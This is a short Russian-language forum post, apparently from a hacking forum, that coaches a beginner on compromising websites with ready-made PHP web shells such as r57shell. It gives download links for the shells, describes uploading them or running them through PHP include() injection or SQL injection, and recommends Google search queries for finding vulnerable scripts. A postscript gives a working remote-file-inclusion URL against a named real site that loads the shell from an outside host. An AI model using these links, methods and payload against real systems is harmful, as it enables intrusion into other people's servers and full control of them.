1. шелл создавать не нужно, уже есть готовые:
а) http://rst.void.ru/download/r57shell.txt
б) http://nst.void.ru/?q=releases&download=6
etc...
вот статья про шеллы и что это вообще такое:
http://optics.org.ua/Aboutshell.rar

2. Чтобы использовать шелл, нужно чтобы его код исполнился на уязвимой системе... Этого можно достичь обычно двумя способами:
а) залить его каким либо способом (ftp или через веб) и открыть в браузере =)
б) ипользовать уязвимости в коде: php injection (обычно банальный include() ), либо sql injection (обычно into file), где шелл заливать не нужно, его код берётся из вне

3. Чтобы найти уязвимые скрипты, нужно:
а) пользоваться ПОИСКОМ и смотреть сайты в моей подписи
б) использовать google, со специальными запросами (ищи и всё найдёшь! )
в) щупать самому

p.s.

пример php injection - _http://www.the-loan-center.net/sphider/admin/configset.php?settings_dir=http://rst.void.ru/download/r57shell.txt?

p.p.s

могу писать бред, т.к. нахожусь в "неадекватном" состоянии